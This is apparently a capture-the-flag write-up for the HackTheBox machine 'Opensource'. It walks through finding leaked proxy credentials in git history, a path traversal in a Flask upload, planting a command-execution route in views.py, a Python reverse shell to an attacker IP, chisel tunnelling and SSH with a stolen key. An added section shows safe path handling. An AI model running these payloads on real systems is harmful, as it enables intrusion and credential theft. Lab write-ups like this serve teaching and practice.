HackTheBox Opensource Write up

 

 
We start by scanning with Nmap.
❯ nmap 10.10.11.164
Nmap scan report for 10.10.11.164
PORT      STATE SERVICE
22/tcp   open     ssh
80/tcp   open     http
3000/tcp filtered ppp
Port 80 is open; if we open the URL in a browser we see a website that offers a source download.

After unzipping it we see a source folder with a .git directory inside.


We can do a bit of recon with git commands to see what we can get.
As we can see, there is a username and password in the commit history.
❯ git branch
  dev
  public
❯ git log dev --oneline
c41fede (dev) ease testing
be4da71 added gitignore
a76f8f7 updated
ee9d9f1 initial
❯ git show a76f8f7
commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
    updated
+ "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
+ "http.proxy": "http://dev01:Soulless_Developer#2022@10.10.10.128:5187/",
+ "http.proxyStrictSSL": false
Now take a look in app/app/: there is a views.py file that stores the view functions.
Looking at file_url = request.host_url + "uploads/" + file_name,
the upload page has a path traversal if we intercept the request in Burp Suite.

We can perform the path traversal by URL-encoding this string: ..//..//..//..//..//etc/passwd

We get this when we click on the file in /upload.
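The upload bug above comes from joining a user-controlled filename into the uploads directory without checking where the result lands. As an added example (constructed here, not the box's own code), the vulnerable pattern sits beside a hardened handler that allow-lists the name and verifies the resolved path stays inside the upload root; UPLOAD_DIR and the function names are assumptions.

```python
import os

# Assumed upload root for this constructed example (not the box's real path).
UPLOAD_DIR = "/app/public/uploads"


def vulnerable_upload_path(file_name: str) -> str:
    """Constructed vulnerable handler: the user-supplied name is joined blindly.

    os.path.join drops the base when the right-hand side is absolute, and '..'
    segments are honoured, so a crafted filename can land outside UPLOAD_DIR.
    """
    return os.path.normpath(os.path.join(UPLOAD_DIR, file_name))


def safe_upload_path(file_name: str) -> str:
    """Hardened version: allow-list the name, then verify containment.

    Rejecting separators outright is more robust than stripping '../' patterns,
    which deny-lists tend to miss (e.g. doubled slashes). The realpath plus
    commonpath check catches anything that still resolves outside the root.
    """
    root = os.path.realpath(UPLOAD_DIR)
    if not file_name or "/" in file_name or "\\" in file_name or file_name in (".", ".."):
        raise ValueError(f"rejected filename: {file_name!r}")
    candidate = os.path.realpath(os.path.join(root, file_name))
    # commonpath (not startswith) so a sibling like uploads_evil/ is not accepted.
    if os.path.commonpath([root, candidate]) != root or candidate == root:
        raise ValueError(f"path escapes upload directory: {file_name!r}")
    return candidate


def upload_allowed(file_name: str) -> bool:
    """True when the hardened handler would accept the filename."""
    try:
        safe_upload_path(file_name)
    except ValueError:
        return False
    return True


def escapes_upload_dir(file_name: str) -> bool:
    """Detection helper: True when the naive join would leave UPLOAD_DIR.

    Log such requests at the upload endpoint; they are traversal attempts.
    """
    root = os.path.normpath(UPLOAD_DIR)
    return os.path.commonpath([root, vulnerable_upload_path(file_name)]) != root
```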


After this I try to add another app.route to get a reverse shell by adding these lines of code to views.py:
@app.route('/kira')
def cmd():
    return os.system(request.args.get('cmd'))
After adding this code to views.py, I upload it at 10.10.11.164/upload and intercept the request in Burp to change the filename to "..//app/app/views.py", and our views.py file is uploaded successfully.

To get a reverse shell on our terminal I use https://www.revshells.com
Open the browser to http://10.10.11.164/kira?cmd= and paste the reverse shell after cmd=

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
Start Netcat listening on your reverse-shell port before pressing Enter on the URL.
❯ sudo netcat -lvnp 4444
Connection received on 10.10.11.164
/app # whoami
root
/app # ifconfig
          inet addr:172.17.0.5
As we saw in the Nmap scan, port 3000 was filtered, but now we have a shell as root inside the container. There is a tool called chisel that can relay the traffic as a single executable file. We need to upload it to the HTB server using wget, then follow the commands below.

On attacker machine
❯ chisel server --reverse --port 8000
2022/06/09 14:33:07 server: Reverse tunnelling enabled
2022/06/09 14:33:07 server: Listening on http://0.0.0.0:8000
2022/06/09 14:37:20 server: session#1: tun: proxy#R:3000=>172.17.0.1:3000: Listening
On victim machine
/app # ./chisel client 10.10.14.2:8000 R:3000:172.17.0.1:3000
2022/06/09 19:37:20 client: Connecting to ws://10.10.14.2:8000
2022/06/09 19:37:21 client: Connected
When we access localhost:3000 in the browser we get the Gitea panel; we can log in with the credentials found during recon: dev01:Soulless_Developer#2022.

We get the id_rsa key, which lets us SSH in and read the user.txt flag with this command:
❯ ssh dev01@10.10.11.164 -i id_rsa
dev01@opensource:~$ cat user.txt
dd7************************ff6
dev01@opensource:~$
Next we need to escalate to the root user to get the other flag; we can use linPEAS or pspy by uploading it to the victim over SSH.
We have rooted the machine!!!!

dev01@opensource:/tmp$ cat /tmp/tmp.txt 
1e******************a
dev01@opensource:/tmp$ 
